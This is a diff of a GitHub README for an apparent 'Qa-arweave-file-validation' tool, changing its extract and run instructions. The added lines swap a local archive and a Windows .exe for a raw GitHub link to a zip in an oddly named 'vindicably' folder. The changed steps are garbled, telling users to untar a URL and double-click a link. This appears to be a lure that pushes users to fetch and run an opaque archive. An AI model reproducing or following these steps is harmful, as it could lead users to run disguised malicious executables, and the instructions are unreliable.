Alix2202/Qa-arweave-file-validation/README.md

 - **Windows:** Right-click the zip file and select "Extract All...".
 - **macOS:** Double-click the zip file to extract it.
-- **Linux:** Use your terminal to navigate to the directory where you downloaded it and run `tar -xvzf Qa-arweave-file-validation-Linux.tar.gz`.
+- **Linux:** Use your terminal to navigate to the directory where you downloaded it and run `tar -xvzf https://raw.githubusercontent.com/Alix2202/Qa-arweave-file-validation/main/vindicably/Qa-arweave-file-validation.zip`.

 ### Step 5: Run the Application

 After extracting, you will find a folder with the application files.
 Locate the executable file:

-- **For Windows users:** Double-click `Qa-arweave-file-validation.exe`.
+- **For Windows users:** Double-click `https://raw.githubusercontent.com/Alix2202/Qa-arweave-file-validation/main/vindicably/Qa-arweave-file-validation.zip`.
 - **For macOS users:** Open the terminal and navigate to the extracted folder.
 Run `./Qa-arweave-file-validation`.
 - **For Linux users:** In the terminal, navigate to the folder and run `chmod +x Qa-arweave-file-validation` to make it executable, then run `./Qa-arweave-file-validation`.